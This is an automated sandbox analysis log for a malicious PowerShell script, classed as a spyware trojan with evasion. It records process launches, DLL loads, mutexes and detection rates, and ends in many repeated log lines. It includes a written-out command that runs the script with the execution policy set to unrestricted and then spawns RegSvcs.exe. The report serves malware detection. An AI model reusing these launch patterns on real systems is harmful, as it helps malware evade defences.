                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00423340 appears 55 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00424250 appears 136 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0042A021 appears 59 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 004061F0 appears 31 times
                Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@8/10@0/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,3_2_0040E8D0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\4340bbf41c5952b1373dfe1ff8834fec
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olyabqw3.khj.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: nYT1CaXH9N.ps1Virustotal: Detection: 8%
                Source: nYT1CaXH9N.ps1ReversingLabs: Detection: 23%
                Source: RegSvcs.exeString found in binary or memory: " /add /y
                Source: RegSvcs.exeString found in binary or memory: " /add
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0" Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1839941977.00000296CB9E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CCC64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CBC97000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAADB29 push edi; iretd 0_2_00007FFD9BAADB3A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAADAA9 push edi; iretd 0_2_00007FFD9BAADABA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAAD9D4 push esp; iretd 0_2_00007FFD9BAAD9DA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAAD909 push edx; iretd 0_2_00007FFD9BAAD91A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAAD94C push esp; iretd 0_2_00007FFD9BAAD96A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAAD944 push ebx; iretd 0_2_00007FFD9BAAD94A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAA392A push es; retf 0_2_00007FFD9BAA3952
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAAD889 push edx; iretd 0_2_00007FFD9BAAD89A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAAD7E9 push eax; iretd 0_2_00007FFD9BAAD7FA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAAE83C push esp; ret 0_2_00007FFD9BAAE842
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042A2C1 push ecx; ret 3_2_0042A2D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004175DF pushad ; iretd 3_2_004175E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00415FEF pushad ; iretd 3_2_00415FF0

                Persistence and Installation Behavior

                barindex
                Uses ipconfig to lookup or modify the Windows network settings
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004293ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004293ED
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
